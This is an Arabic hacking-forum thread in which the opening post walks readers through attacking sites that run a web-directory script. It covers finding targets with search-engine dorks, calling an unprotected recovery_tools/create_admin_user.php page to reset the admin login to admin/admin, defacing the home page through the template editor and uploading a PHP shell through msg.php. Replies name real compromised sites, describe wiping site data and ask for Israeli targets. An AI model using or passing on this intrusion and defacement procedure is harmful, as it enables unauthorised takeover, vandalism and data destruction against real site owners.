بسم الله الرحمن الرحيم

اذهب الى اي محرك بحث وليكن www.google.com

top_rated.php

مثـــــــــــــــال :"
http://www.XXX.com/top_rated.php

قم باستبدال top_rated.php

بــ recovery_tools/create_admin_user.php

هكذا...
http://www.XXX.com/recovery_tools/create_admin_user.php

اذا ظهرت لك صفحة مكتوب فيها التالي
Delete old administrator user ....ok
Create new administrator user ....ok

اذن نجحت الان اصبح اسم المستخدم وكلمة المرور admin

user=admin
pass=admin

اذهب الى لوحة التحكم وافعل ماشئت

للدخول للوحة التحكم :
http://www.XXX.com/admin/index.php

شرح بعض خيارات لوحة التحكم المهمه

اذهب الى Change Password لتغيير كلمة المرور

و Edit File Email Address لتغيير البريد

و View/Edit/Delete لحذف او عرض او تعديل

ولتغيير الصفحة الرئيسية

اختر Template Modifier واختار default

ومن File name اختر index html

وادخل على Edit File

واكتب بالفرونت اللي يعجبك والصق كود html هنا اخيراً Save Change

وتقدر تستفيد من الثغره اكثر بتعديل ملف msg.php اذا كان موجود

وتضع فيه كود phpshell واستمتع ..وطبق الاوامر


انتهى ..

وفق الله الجميع
:)

اهلين حبيبي تاز

تسلم من جد على هذه الثغرة الحلوة

وراح اطبقها حاااااااالاً بس ان شاء الله محد يستخدمها على المسلمين

فيه مواقع عربية فيها هالثغرة

وجب التنويه

فمان الله|4||4|

الله يعطيك الف الف الف الف عافيه اخوي تاز وربي انك بطل وشو بطل؟ لكمه قليله لازم نقول اممممممممممممم داهيه بالهكر طبعا يعني صراحه رهييييييييييييب مره والى الاما وانا رح اجربها الحين اوكي حبي والله يعطيك العافيه وارجع اقولك انت بـطـــــل
اخوك
Mr_x_x

السلام عليكم

Mr_x_x & المتمكن


الله يعطيكم العافيه ووخلونا نشووف اختراقاتكم :)

وااااااااااااااااااااااااااااااااااااااااو



الاستاذ تازا هكر


دائما مبدع ومشاءالله عليك وتسلم على هالثغره الحلوووه


وقدرة اخترق فيها تسلم اخوي تازا على هذا الشرح الرائع



ابي توقيع لك ياتازا ==============> واحد من المعجبين فيك

تسلم اخوي

اول باول ما شاء الله عليك

الوليــــد نت & أبو خــالد

مشكورين على ردودكم والله يوفقكم :)

no no :(

no no :confused:


by

مشكووووووووووووور اخوي تاز على الثغرة بس للأسف اليوم شيكت على المواقع العربية
تقريبا 70% الثغرة موجودة:mad::mad::mad::mad:
و الثغرة بعدها طازة يعني بتأكل خبز:D:D:D
الله يعطيك العافية و ان شاء كل جديد بيكون عندك

شكرا على الثفره لكن لما وصلت الى كتابه كلمه :
user : admin
pass : admin
ماضبط !!! وشكرا على الثغره ..

شكرا لك اخى العزيز الثغره عملت معي اشكرك من كل قلبي

ايوا ايوا تاز تصفيق من عندي والف شكر على الثغره ودائما تتحفنا بمواضيعك المميزه :p

يالله انا بادي من الحين .
مااشوف اختراقات ليش ..طيب اجرب واقول اذا في شي يبغى توضيح ,ويمكن ماعرف اتوضح لنا ياتاز زين
وسلااامتك

الصفحه الرئيسيه موراضي ينحذف منه اي شي امر ال delet وجود بس يقول لاااا

بس اخترقت http://www.onlyscripts.com/cp
اذا في توضيح ياتاز
يالله

للمعلومه فقط

Present Password
New Password
Confirm New Password
كلمة السّرّ الحاضرة
كلمة السّرّ الجديدة
أكّد كلمة السّرّ الجديدة

admin1
admin1
http://www.onlyscripts.com

طيب الموقع هذا امصكر الثغره

http://www.alsa7l.net/daleel/recovery_tools/restore_db.php

مشكور يا اخي العزيز


لكن تقدر تقول لي كيف احصل على ثغرات جديده واكون شاكر الك

السارق & خالد7 & Mohammed_777 & شوق & shark_lips

مشكورين ياحبايبي على الردود

واللي جربوا في موقع ولا ضبطت يجرب في موقع ثاني وثالث ..الخ

لان نسبة المواقع المصابه تصل 80 % تقريباً واكثر

افحص كل المواقع في محركات البحث وانا متأكد انك بتحصل خير


شكرا على التوضيح ياخالد 7 واذا فيه موقع مسكرها انت قلت موقع مو كلها;)

shark_lips انا مريت على المواقع العربيه ونبهتهم :) ولكن تفاجأت للاسف انه

في عضو في المنتدى متحمس ويطبق على المواقع العربيه لن اذكر اسمه

لكن حرام عليه :o


شوق ليه No ?:confused: اذا ماكتبنا الثغرات الجديده ننتظر مين !

السارق الثغرات الجديده تحصلها في مواقع السكيورتي

مثل www.securityfocus.com

www.packetstormsecurity.nl

www.securiteam.com/

تحياتي للكل:)

انا يومني قلت على ان الموقع امصكر الثغره
http://www.alsa7l.net/daleel/recovery_tools/restore_db.php
النيه صافيه و كنت ابي اقول صاحب الموقع بصراحه ..بس تفاجائت بعد كلامي ان الموقع
http://www.alsa7l.net

مشكور أخوي TaZ HaCkEr


ما قصرت الله يعطيك العافية :)

وش نسوي ياخالد 7 ناس ماتفهم :)

Al7ooOooT

الله يوفقكم :)

http://www.turkscripts.com

ساعتين وانا امسح فيه حتى البور مسحته وانا ماادري :mad:

تاز اشرحلي إذا وصلت للصفحه ...
http://www.onlyscripts.com/admin/template_modify.php
كل ما ابي ادخل الكود واضغط يقول غلط ومايصير
وضغطت مره ثانيه يقولي خلي تاز يقولك لوول

مابغت تنحل ياتاز من امس سهران الله يرجك :Dواللي حلها واحد معنا بالمنتدى sowrdman
بارك الله فيكم كللمك

هذا اول واحدhttp://www.myadelaide.com

الطريقة دخول من admin

المهم
اذا دخلت راح تلاقي في وسط الصفحه
Welcome to the INDEXU Administrator Control Panel

Active


--------------------------------------------------------------------------------

Categories

Links 325

Reviews
0

Mailing List Subscribers 0


Pending


--------------------------------------------------------------------------------

Links 2

Reviews 0

Broken Link Report 0

ــــــــــــــــــــــــــــــــــــــــــــــــــ ــــــــــــــــــــــــــــــــــــــــــــــــــ ــــــــــــــــــــــــــــــــــــــــ

تمام :اظغط على Categories

هتفتحلك صفحه ثانيه ...تحت هذي الكلمه View Categories

في سطوور وبجنبه كلمة [edit] اضغط عليه راح تلاقي اربع مربعات لنسخ الاكواد

اكتب اللي تكتبه بعده اضغط على edit Categories

وعلى كذا احنا خالصين وشكر لتاز وشكر لsowrd
وسلامتكم
والنوم ساس اللوم لوول

الف شكر الك يا تاز على هالثغره الجميله ومشكور والله يعطيك الف عافيه
انا طبقت الشرح ونجحت في اختراق عدد من المواقع وكل شي تمام
بس بعد عددت ساعات فتحت على الصفحات يلي اخترقتهم
وجددت شخص جديد مخترق المواقع فادا ممكن تشرح لنا
كيف ممكن نغلق الثغره مره اخرى للضروره القصوى
وكمان مره الف شكر لعيونك

خالد 7 ماشاء الله عليك مجتهد مشكور على الاضافه

وفيه بعد تدخل على setup واحذف الـ Topكامل ;)



saso اظن فيه كود يقووم بهالعمل لكن مو موجود عندي

اقولك حاول ترفع phpshell علشان تخترق السيرفر كامل

فمان الله

شكرا يا استاد TaZ HaCkEr
على التوضيح والله ما يرحمنا من مواضيعك الجذابه
عندي استفسار تاني
انا مبتدا في هكر المواقع وما اعرف ما هوphpshell
بس بطلب منك طلب ولو تسمح يا اخ TaZ HaCkEr
ان تشرحلي موضوع phpshell وبكون مشكور اكتير الك
يا احلى مشرف
يامعلم

مشكوور ياsaso

وياليت تتفضل على منتدى امن المواقع والشبكات

واسئل واطلب اللي تبي وانا متستعد اجاوبك :)

مرحبا اخي TaZ HaCkEr شكرا الك كتير على الرد
وحبك لمساعده الاخرين والله انك تستحق كل تقدير واحترام
اما بالنسبه للموضوع فوجدت في احدى المنتديات شرح وافي وكافي عن
phpshell واستكفي في هادا الشرح
وشكرا الك يا اخي TaZ HaCkEr واعرف انك ما بتقصر مع احد
اخوك saso

welcome any time saso :)

يااخوي احصل مواقع كثيره واخش لوحة التحكم
وكل ما اجي امسح مافيه فايده
واروح واركب الكود الهتميل قلت نشوف ويضا مايفه فاايده
ارجوو التوضيح والله المواقع كثيره خشيت على لوحة التحكم

بعض المواقع ماتقدر تعدل فيها..

لكن ادخل على لوحة التحكم وسو Setup واحذف كل شي وارجع جرب مره ثانيه

:)

و انا كمان اخى كل شى بترجع و لكن فى بعض الموقع يكون ما لك صلاحيات فى اشى كثر


الهجوم

مثل ماقلت مالك الا تسوي Setup :)

اخي الكبير TaZ HaCkEr هل توجد طريقه اخرى للبحث عن هده الثغره
في محركات البحث غير كلمه
top_rated.php
ومشكور يا اخي العزير

هذي افضل كلمة على مااعتقد علشان تحصل على النتايج

او جرب في جوجل allinurl: top_rated.php

كيف الشباب أخي العزيز تاز بس حابب أسأل أنه بعد تغيير صفحة الإندكس لا تظهر عند فتح الموقع يعني لنفرض عدلت في الموقع
www.XxX.com
لازم أول ما تفتح الموقع تتطلع الاندكس المعدلة يعني لازم نفتح
www.XxX.com/index.html
فتظهر الاندكس المعدلة
أو ماذا
:confused:

انت لما تغير الاندكس تغير الاندكس تبع الـ Top rated بس

:)

تمام تمام شكرا" :)

صرت شايف كم موقع تتطبق عليهم الثغرة لكن عند الدخول للوحة التحكم لا يقبل:confused:

U:admin
P:admin

------
http://www.backnetz24.de/
-------
وبالنسبة لبعد الاختراق ما هو امتداد الصفحة المخترق الإندكس لل top rated
وين إيش الباث المسار

أحلى شباب
http://www.3asfh.com/vb/showthread.php?s=&threadid=3683
:)

مشكور يا احلى مشرف على الثغره
وما تنسانا بالثغرات الجديده

مبروووك ;)MR.DJAY

saso ان شاء الله كل جديد :)

هلا فيك هلا بالحبيب TaZ HaCkEr إن شاء الله نلتقي على الماسنجر قريبا" :)

ان شاء الله

ارسل لي رساله خاصه ايميلك

:)

تم إرسالها :cool:

شكرا على هذة الثغرة الرائعة ولكني
وجدت ان معظم المواقع المانية
وكثير منها قد قام بتغطية هذة الثغرة
انا أريد ثغرات للمواقع الاسرائيلية
وشكرااااااااااااااااااا

http://web.kempo.ru/
شكرن أخ تاز عالموضوع
محدش ييأس
الثغره جربتها في 8 مواقع قبل ده علي ما جت:D
اخوكم التنين

El_TeNNiiN & momeeen

موفقين ولابد المحاولة مره مرتين ثلاث:)

السلام عليكم ااخواني انا جربت الثغرة وجات الرسالة
Delete old administrator user ....ok
Create new administrator user ....ok

ولمن احاول ادخل بي
اليوزرنيم والباسورد مايدخل

اارجوا الافادة ااخوانيadmin

شوف اخوي تاز انا ساويت زي ماقلت وشوف

http://www.backnetz24.de/recovery_tools/create_admin_user.php

كتبت admin
للباسورد واليوزر نيم بس مواراضي

ايش اساوي؟:rolleyes:

شوفي غيره يااختي

وبتنجح معاك :)